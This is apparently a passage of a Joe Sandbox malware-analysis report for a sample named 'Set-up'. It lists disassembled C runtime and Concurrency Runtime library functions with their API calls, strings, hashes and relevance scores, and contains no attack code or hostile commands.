Opcode ID: b79ca75c2bbeff4b5b5b434e1ebc126c1f5576b4f9a7689ea0a685a4071199a8
Instruction ID: 1e6b4ea66840dd280a189e158ddfd6ae0423b67f9fe8b4a3550d9a120fef15d1
Opcode Fuzzy Hash: b79ca75c2bbeff4b5b5b434e1ebc126c1f5576b4f9a7689ea0a685a4071199a8
Instruction Fuzzy Hash: 5E61F3B6904191EFDB20EFB8D9C195C77F4EB06714B2505BED530AB180EB39DA80CB51

Function 6BB7248A Relevance: 30.2, APIs: 20, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

wcschr.MSVCR100(00000000,0000003D,74DEDF80,00000000,01821910), ref: 6BB724B5
free.MSVCR100(?,74DEDF80,00000000,01821910), ref: 6BB72528
_errno.MSVCR100(74DEDF80,00000000,01821910), ref: 6BB773F0
_errno.MSVCR100(01821910), ref: 6BB91473
_invalid_parameter_noinfo.MSVCR100(01821910), ref: 6BB9147E
___mbtow_environ.LIBCMT ref: 6BB914B0

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$___mbtow_environ_invalid_parameter_noinfofreewcschr
String ID:
API String ID: 3080074160-0
Opcode ID: 4ce5c1004b758249a8e23d26ab67fee6b817b7ffbfcd95a9299578f288543ee2
Instruction ID: 084180ed92761785ee319ba63ae17c3d56b1a80ffba5e329b2106eac061e3242
Opcode Fuzzy Hash: 4ce5c1004b758249a8e23d26ab67fee6b817b7ffbfcd95a9299578f288543ee2
Instruction Fuzzy Hash: 91714772A042A0FFCB21AF78D88195C37F4EF4AB54B25417AE421D7180EB78CA81DB91

Function 6BB6F334 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB6F313
DName::operator+.LIBCMT ref: 6BB6F31A
DName::operator+.LIBCMT ref: 6BB6F3A0
DName::DName.LIBCMT ref: 6BB8E92B
DName::operator+.LIBCMT ref: 6BB8E932

Strings

`anonymous namespace', xrefs: 6BB8EA61

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: `anonymous namespace'
API String ID: 168861036-3062148218
Opcode ID: a607ae36426471f36ae91e7971de6f032fc00e02ff8c983422f6077b7f4c8c7d
Instruction ID: 96eb5d14fa17d567744c0d544b595e606b749709d8d972bc3146c3529101c350
Opcode Fuzzy Hash: a607ae36426471f36ae91e7971de6f032fc00e02ff8c983422f6077b7f4c8c7d
Instruction Fuzzy Hash: FA816D71A442C8AFDB10DFA8D841AEEBBF9EF16344F44446EE595D7240EB38AE44CB50

Function 6BB6F9A4 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 233COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB8D3AE
DName::DName.LIBCMT ref: 6BB8D3E3
atol.MSVCR100(6BB6F99F,6BB6F99F,00000010,FFFF0000,00000000,00000000), ref: 6BB8D46D

Strings

`template-parameter, xrefs: 6BB8D498
`non-type-template-parameter, xrefs: 6BB8D4BF
., xrefs: 6BB8D35A
., xrefs: 6BB8D360
NULL, xrefs: 6BB8D3A7

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::$atol
String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
API String ID: 2083219425-3945972591
Opcode ID: 9a060de299f625538f72383c4e9c0f7d75d8856ca459c8ebbebb9793206f0a7c
Instruction ID: a39b21030f8df85b5e11d48665ade3361afedfcb4df721b8df118670b3a8335c
Opcode Fuzzy Hash: 9a060de299f625538f72383c4e9c0f7d75d8856ca459c8ebbebb9793206f0a7c
Instruction Fuzzy Hash: 387195719842D8AADB10DBB8EC85FED7778EB15748F50049FE15997080EF7C9A44CB11

Function 6BB768DC Relevance: 28.8, APIs: 19, Instructions: 273COMMON

Download Yara Rule

APIs

_memset.LIBCMT(?,000000FF,00000024), ref: 6BB76905
_get_daylight.MSVCR100(?), ref: 6BB76941
_get_dstbias.MSVCR100(?), ref: 6BB76953
_get_timezone.MSVCR100(?), ref: 6BB76965
_gmtime64_s.MSVCR100(?,?), ref: 6BB76999
_errno.MSVCR100 ref: 6BB769BF
_gmtime64_s.MSVCR100(?,?), ref: 6BB769CB
_errno.MSVCR100 ref: 6BB89DE1
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89DEB
_errno.MSVCR100 ref: 6BB89DF7
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89E01
_gmtime64_s.MSVCR100(?,?), ref: 6BB89E3A
__allrem.LIBCMT ref: 6BB89EA5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB89EC1
__allrem.LIBCMT ref: 6BB89ED8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB89EF6
__allrem.LIBCMT ref: 6BB89F0D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
String ID:
API String ID: 3568092448-0
Opcode ID: 67b1acd550eb6eb78ed56f4f5474890e4bb3ff7976e53ab9030ef7ac5ea17b89
Instruction ID: 96906fca29af2002f4c1ee5437a4778642e1fa20b4e12a10041d1a53a64fd5a4
Opcode Fuzzy Hash: 67b1acd550eb6eb78ed56f4f5474890e4bb3ff7976e53ab9030ef7ac5ea17b89
Instruction Fuzzy Hash: 0581E371A007829BEB24AE78CC81B5E77F9DF89728F14453AE465D7681FB7CD9008B50

Function 6BB9BAE2 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 111memorylibraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB9BAE9
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000020,6BB9BAB4,00000000,6BC0462C,0000000C,6BBA018B,880653CF,?,?), ref: 6BB9BB19
InitializeCriticalSectionAndSpinCount.KERNEL32(?), ref: 6BB9BB58
TlsAlloc.KERNEL32 ref: 6BB9BB62
GetLastError.KERNEL32 ref: 6BB9BB70
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BB88
_CxxThrowException.MSVCR100(6BB6BD3C,6BB6BDD8,?,00000001), ref: 6BB9BB96
GetModuleHandleW.KERNEL32(kernel32.dll,FlushProcessWriteBuffers), ref: 6BB9BBA9
GetProcAddress.KERNEL32(00000000), ref: 6BB9BBB0
VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 6BB9BBE3
std::exception::exception.LIBCMT(?,00000001), ref: 6BB9BC03
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BB9BC30
??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BB9BC4B

Strings

FlushProcessWriteBuffers, xrefs: 6BB9BB9B
kernel32.dll, xrefs: 6BB9BBA0
bad allocation, xrefs: 6BB9BBFC

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: AllocCountCriticalInitializeSectionSpin$AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionH_prolog3HandleLastModuleProcThrowVirtualstd::exception::exception
String ID: FlushProcessWriteBuffers$bad allocation$kernel32.dll
API String ID: 2685218194-103648123
Opcode ID: 01cc62c17f1e4e4753571c6457fe2696e4211796152a9b1ebae7cce38ca64e3e
Instruction ID: a69c543e1425bffa508c3719b2428dc6789c514746a5bd0710a9b1b6b0be6ae1
Opcode Fuzzy Hash: 01cc62c17f1e4e4753571c6457fe2696e4211796152a9b1ebae7cce38ca64e3e
Instruction Fuzzy Hash: 654179B19016A6EFCB209F24C885A9EBFB8FF0A750F04811AF114D7680D7B9A550CFE0

Function 6BB97862 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 247timeCOMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCR100(?,6BBFFE78), ref: 6BB978C7

Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813

std::exception::exception.LIBCMT ref: 6BB97901
?wait@event@Concurrency@@QAEII@Z.MSVCR100(00000001,880653CF,00000000,6BB95CBE,6BB95C86), ref: 6BB9791C
std::exception::exception.LIBCMT ref: 6BB978B0

Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D

std::exception::exception.LIBCMT ref: 6BB97956
??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,?,00000000,880653CF,?,00000000,880653CF,00000000,6BB95CBE,6BB95C86), ref: 6BB979BF

Part of subcall function 6BB9B030: __EH_prolog3.LIBCMT ref: 6BB9B037

?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB97A30
?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB97A85
?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(00000002,6BB97DE5,880653CF,000000FF,00000000,00000020), ref: 6BB97AEE
CreateTimerQueueTimer.KERNEL32(880653DF,00000000,6BB97DE5,880653CF,000000FF,00000000,00000020), ref: 6BB97AF9
std::exception::exception.LIBCMT(?,00000001), ref: 6BB97B15
?Block@Context@Concurrency@@SAXXZ.MSVCR100 ref: 6BB97B37

Strings

pEvents, xrefs: 6BB978A8, 6BB978F9, 6BB9794E
bad allocation, xrefs: 6BB97B0D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Concurrency@@$std::exception::exception$Timer$?unlock@critical_section@Exception$??0scoped_lock@critical_section@?wait@event@Block@Context@Copy_strCreateH_prolog3QueueQueue@details@RaiseSharedThrowV12@@std::exception::_
String ID: bad allocation$pEvents
API String ID: 3019020058-4135266256
Opcode ID: fa5a8cc6033b45e211a71aabb02293c2cf44d848317549f95b3f8009e50fbe43
Instruction ID: e19dcf9b6249b0ad7228c1dac4726b4908acb607131b08e6066b8bf8b17e6eb2
Opcode Fuzzy Hash: fa5a8cc6033b45e211a71aabb02293c2cf44d848317549f95b3f8009e50fbe43
Instruction Fuzzy Hash: FFA17B71508281DFC720EF26E881B9EB7E4FF86714F104A7DE4A587290D7B8E945CB92

Function 6BB9C337 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 224COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C371
_memset.LIBCMT(00000000,00000000,00000024,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C37D
??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000024,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C394
??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000024,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C3B2
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C3DA
GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB9C3E1
_memset.LIBCMT(00000002,00000000,?,?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C3FD
??_U@YAPAXI@Z.MSVCR100(00000000,00000002,00000000,?,?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C41D
??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C468
_memset.LIBCMT(00000000,00000000,6BB95C86,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C479
??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,6BB95C86,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C490
free.MSVCR100(?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C5A1

Strings

$, xrefs: 6BB9C513
$, xrefs: 6BB9C582

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _memset$Process$AffinityCurrentMaskfree
String ID: $$$
API String ID: 3179535153-233714265
Opcode ID: 5fe5189ccbe0e0e4999b292724b51c2531576de2ab803fed8026199a09318e1a
Instruction ID: 1125f299d0f9cf5e999546687101aba5689f5cc4bc2cbd702cc128f3aded43f3
Opcode Fuzzy Hash: 5fe5189ccbe0e0e4999b292724b51c2531576de2ab803fed8026199a09318e1a
Instruction Fuzzy Hash: 2981DD70A01684EFDB08DF68D592869BBF4FB0A30074194AFE906DBA40D775EE51DF90

Function 6BB9BD35 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadGroupAffinity,0000FFFF,?,00000000,?,?,?,?,?,?,?,6BB9C2D2), ref: 6BB9BD51
GetProcAddress.KERNEL32(00000000), ref: 6BB9BD5A
GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadGroupAffinity,?,?,?,?,?,?,?,6BB9C2D2), ref: 6BB9BD65
GetProcAddress.KERNEL32(00000000), ref: 6BB9BD68
GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx), ref: 6BB9BD96
GetProcAddress.KERNEL32(00000000), ref: 6BB9BD99
GetLastError.KERNEL32 ref: 6BB9BD9F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BDB7
_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9BDC5
GetLastError.KERNEL32 ref: 6BB9BDDD

Strings

SetThreadGroupAffinity, xrefs: 6BB9BD46
kernel32.dll, xrefs: 6BB9BD4B, 6BB9BD50, 6BB9BD61, 6BB9BD8A
GetThreadGroupAffinity, xrefs: 6BB9BD5C
GetCurrentProcessorNumberEx, xrefs: 6BB9BD85

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: AddressHandleModuleProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1483908321-465693683
Opcode ID: ecc3aa859a7a912f588cf54daa89e9b6c4c87d5fa19ae0e393e4e8fe8a28de99
Instruction ID: aba0c621b89a755f022cb80ef65e800f6b1dfe414638e112c047f67eda9417e5
Opcode Fuzzy Hash: ecc3aa859a7a912f588cf54daa89e9b6c4c87d5fa19ae0e393e4e8fe8a28de99
Instruction Fuzzy Hash: FB119E72904289ABDF24BFB5ED45AAF3BBCEF46650B05047AE501D3140DB3DDA01DBA0

Function 6BB658A9 Relevance: 24.2, APIs: 16, Instructions: 234stringCOMMON

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 6BB657BE
memcmp.MSVCR100(?,000000FE), ref: 6BB6587C
_getptd.MSVCR100(00000001,00000000), ref: 6BB658D1
__expandlocale.LIBCMT ref: 6BB658F9

Part of subcall function 6BB64CF9: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6BB64D2F
Part of subcall function 6BB64CF9: strcpy_s.MSVCR100(00000000,00000000,6BB64DD8,00000000,00000000,00000005), ref: 6BB64D9D

strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 6BB65918
_strlen.LIBCMT(?,?,?,?,?,00000001,00000000), ref: 6BB6592E
_malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 6BB6593D

Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5

memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 6BB6598B
strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 6BB659B4
memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6BB659EE
_CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6BB65A1A
InterlockedDecrement.KERNEL32(00000000), ref: 6BB65A43
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6BB90C64

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _getptdmemcpystrcpy_s$DecrementInterlockedStringType___crt__expandlocale__invoke_watson_malloc_crt_strlenmallocmemcmpstrcmp
String ID:
API String ID: 986606718-0
Opcode ID: 5b3ad50583c6e51cdca8811eabc3e8b5937c701d379ab7ec38bd7407f26486de
Instruction ID: 2329931387941ae65e20ba436cab9f0db1351c720da17b606fb910734b22f6e8
Opcode Fuzzy Hash: 5b3ad50583c6e51cdca8811eabc3e8b5937c701d379ab7ec38bd7407f26486de
Instruction Fuzzy Hash: 5CA10671A002599FDB25CF28C891BE9B7B5FF49344F1040AAEA1DE7251EB35AE90CF50

Function 6BB7373E Relevance: 24.2, APIs: 16, Instructions: 198processsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT(?,00000000,00000044), ref: 6BB73786
_calloc_crt.MSVCR100(?,00000001), ref: 6BB737E4
__doserrno.MSVCR100 ref: 6BB7384A
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000000,?,00000000,?,?), ref: 6BB7386E
GetLastError.KERNEL32 ref: 6BB73876
free.MSVCR100(?), ref: 6BB73881

Part of subcall function 6BB6014E: HeapFree.KERNEL32(00000000,00000000,?,6BB87602,00000000), ref: 6BB60164

WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BB738A9
GetExitCodeProcess.KERNEL32(?,?), ref: 6BB738B6
CloseHandle.KERNEL32(?), ref: 6BB738C2
CloseHandle.KERNEL32(?), ref: 6BB738C7
__dosmaperr.LIBCMT(00000000), ref: 6BB882FB
_exit.MSVCR100(00000000), ref: 6BB88304

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFreeHeapLastObjectSingleWait__doserrno__dosmaperr_calloc_crt_exit_memsetfree
String ID:
API String ID: 2263466040-0
Opcode ID: f50e3cd9950363e20095cc92255f257aee512bbe74eb1937f01468e5204c5754
Instruction ID: 78710e172279d2cbd465a9bff26c9687908a0d81622e5f17ca9c789928937815
Opcode Fuzzy Hash: f50e3cd9950363e20095cc92255f257aee512bbe74eb1937f01468e5204c5754
Instruction Fuzzy Hash: D2610172D04299AFDF31AFA8CC8199DBBB5EF06314F1541B6E121AB2A0D739CD42CB51

Function 6BB62891 Relevance: 24.2, APIs: 16, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.MSVCR100(?), ref: 6BB6CBC5
_fileno.MSVCR100(?), ref: 6BB6CBD5
_fileno.MSVCR100(?), ref: 6BB6CBE5
_fileno.MSVCR100(?,?), ref: 6BB6CBF5
_fileno.MSVCR100(?), ref: 6BB6CC19
_fileno.MSVCR100(?), ref: 6BB6CC29
_fileno.MSVCR100(?), ref: 6BB6CC39
_fileno.MSVCR100(?,?), ref: 6BB6CC49
isleadbyte.MSVCR100(?), ref: 6BB6CC86
__fassign.LIBCMT(?,00000000,00000001), ref: 6BB6CC9D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _fileno$__fassignisleadbyte
String ID:
API String ID: 3459433188-0
Opcode ID: d32a098543380e4125f7640c6016e8c7f877f801fa4a0d74297e3607b72ced5e
Instruction ID: 0bc1eca45d380a4f249f0e6a45cedc844ccbfb629a7ff49a229f6853f7187655
Opcode Fuzzy Hash: d32a098543380e4125f7640c6016e8c7f877f801fa4a0d74297e3607b72ced5e
Instruction Fuzzy Hash: 6D512572404AD09EC7259F38D841A6E3BB49F037B8724065EE5B58B1D1FB3CDE468B94

Function 6BB9FC51 Relevance: 24.1, APIs: 16, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB9FC58
??0SchedulerPolicy@Concurrency@@QAE@ABV01@@Z.MSVCR100(?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004,6BBA0408,6BC04628,0000000C,6BBA0342), ref: 6BB9FC71

Part of subcall function 6BBA20FC: ??2@YAPAXI@Z.MSVCR100(00000024,00000000,?,6BB9FC76,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004), ref: 6BBA2106
Part of subcall function 6BBA20FC: memcpy.MSVCR100(00000000,?,00000024,00000024,00000000,?,6BB9FC76,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000), ref: 6BBA2115

Part of subcall function 6BBA1D1A: ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004), ref: 6BBA1D5E
Part of subcall function 6BBA1D1A: _memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000), ref: 6BBA1D6E
Part of subcall function 6BBA1D1A: ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?), ref: 6BBA1D75
Part of subcall function 6BBA1D1A: ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BBA1DA3
Part of subcall function 6BBA1D1A: InitializeSListHead.KERNEL32(?), ref: 6BBA1DB8
Part of subcall function 6BBA1D1A: InitializeSListHead.KERNEL32(?), ref: 6BBA1DBE

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004,6BBA0408,6BC04628,0000000C), ref: 6BB9FCA1
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD43
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD68
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD71
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD7A
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD80

Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181

